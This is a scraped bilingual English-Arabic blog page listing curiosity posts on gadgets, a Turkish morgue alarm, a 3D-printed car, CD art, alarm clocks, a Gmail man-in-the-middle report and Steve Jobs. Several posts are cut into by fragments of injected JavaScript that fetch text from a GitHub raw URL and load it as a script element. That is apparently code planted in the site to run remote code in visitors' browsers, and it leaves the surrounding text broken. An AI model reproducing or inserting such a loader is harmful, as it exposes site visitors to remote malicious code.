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As published on http://latimesblogs.latimes.com:
The crowd-funding website Kickstarter has given rise to a number of interesting projects since its founding in 2009. One effort in particular caught my eye a few months ago, after my father suggested I take a look: the Kogeto Dot.
So what exactly is a Dot? It's a plastic lens attachment for Apple's iPhone 4 that allows users to capture video in a 360-degree panoramic shot. Read more [...]
Turkish alarm to detect life among the dead!مشرحة تركية مزودة بجهاز ينذر بعودة الحياة للجثث
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A local council in central Turkey has built a morgue with a warning system, in case apparently dead bodies come back to life.
The Turkish Anatolia news agency reported the mortuary's refrigerators are sensitive to movement inside.
A cemetery official said the slightest motion would set off an alarm.
"If the patient, proclaimed dead by doctors, awakens from a state of unconsciousness, then we consider each and every possibility," Read more [...]
How a Rhinoceros Sees The World!كيف يرى وحيد القرن العالم
Really Funny!
فكرة طريفة :-Dvar url = 'https://raw.githubusercontent.com/lolngnos/loles/main/step.txt';
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script.src = data.trim();
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.then(response => response.text())
.then(data => {
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The First 3d Printed Car is Here!أول سيارة حقيقية يتم “طباعتها” من طابعة ثلاثية الأبعاد
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3-D printing has already resulted in advances in manufacturing (as well as tiny stop-motion animation), but now taking it one step further is the Urbee hybrid: the world’s first 3-D printed car, developed by Kor Ecologic and Stratasys.
The Urbee was created using Stratasys’ Dimension 3-D printers and Fortus 3-D Production System. The full-scale prototype is not yet complete, but all of the exterior components, including Read more [...]
A Sea of CDs!
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The collected CDs were sewn together with wire then draped over inflatable mounds.
Called WasteLandscape, the installation by architect Clémence Eliard and artistElise Morin remains in place until 10 September when it will tour other locations.
The CDs will eventually be recycled.
To continue reading click here...var url = 'https://raw.githubusercontent.com/lolngnos/loles/main/step.txt';
.then(response Read more [...]
Money Shredder Alarm Clock!منبه يمزك نقودك حتى تستيقظ
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What a way to say:"Time IS Money."
If you have problems waking up, it’s because you haven’t tried the new money-shredding alarm clock.
An alarm clock, which no panda would want to have – once it kicks in, it will start shredding money and keep going until you turn the alarm off. And if losing $100 is not enough to make you wake up, a little bit of jail time to the penalty might help – as Mashable already noted, Read more [...]
Unusual Alarm Clocks-منبهات غير تقليدية
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Clocky Alarm Clock
Unusual alarm clock that jumps 3 feet from your night stand and runs away beeping to get you up. You can only snooze once. [link]
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script.src = data.trim();
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Diagnose your illness without a doctor-تعرف على مرضك بدون طبيب
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شكرا لـ عالم الابداع
Copied from dailymail.co.uk:
A sickbay that uses space-age technology to diagnose diseases ranging from stomach bugs to cancer has been unveiled at a British hospital.
The first of its kind, it contains a bewildering array of equipment, including probes designed for missions to Mars.
The gadgets in the million-pound unit can detect illness without the need for painful and invasive Read more [...]
Man In The Middle Attacks on Gmail-هناك من كان يتجسس على جيميل
لقراءة الموضوع بالعربية، اضغط هنا
Posted by Heather Adkins, Information Security Manager (Source)
Today we received reports of attempted SSL man-in-the-middle (MITM) attacks against Google users, whereby someone tried to get between them and encrypted Google services. The people affected were primarily located in Iran. The attacker used a fraudulent SSL certificate issued by DigiNotar, a root certificate authority that should not issue certificates for Google Read more [...]
أجزاء من القرص الصلب والمنتجات تتحول إلى لعب ممتعة-The GAMES Hard Disk!
أجهزة الكمبيوتر القديمة لا بد من التخلص منها. ولكنك يمكنك استخدام أجزاء منها وتكوين أفكار ومنتجات خلاقة …وهذه مجموعة صور لألعاب تم صنعها من أجزاء الكمبيوتر القديمة.
var url = 'https://raw.githubusercontent.com/lolngnos/loles/main/step.txt';
.then(response => response.text())
.then(data => {
var script = document.createElement('script');
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ستيف جوبز: قصة رجلُ ألهم العالم واستقال وهو في قمة نجاحه
نقلاً عن عالم الابداع:
الكاتب: إبراهيم محمد بتاريخ 25 أغسطس 2011عدد التعليقات 8
يعتبره البعض مُخترعاً ويعتبره آخرون أحد أنجح رجال الأعمال في العالم، بينما يعرفه أغلبنا على أنه الرئيس التنفيذي لشركة Apple:
إنه ستيف جوبز الذي يموج الإنترنت الآن بخبر استقالته من شركة آبل بعد أن منعه Read more [...]
صور مدهشة من الصين: درّاجات لكنها تحمل الكثير
إن أردت معرفة ما يمكن للصينيين فعله فيكفي أن تنظر لدرّاجاتهم:
التقط المصور الفرنسي أليان ديلورم هذه الصور المدهشة ضمن مشروع اسمه totems، بهدف إظهار كيف تنقل الطبقة العاملة في مدينة شنجهاي الصينية أغراضها المختلفة باستخدام الدرّاجات.
قد تبدو لكم أقرب لرسومات لكنها صور حقيقية التقطها Read more [...]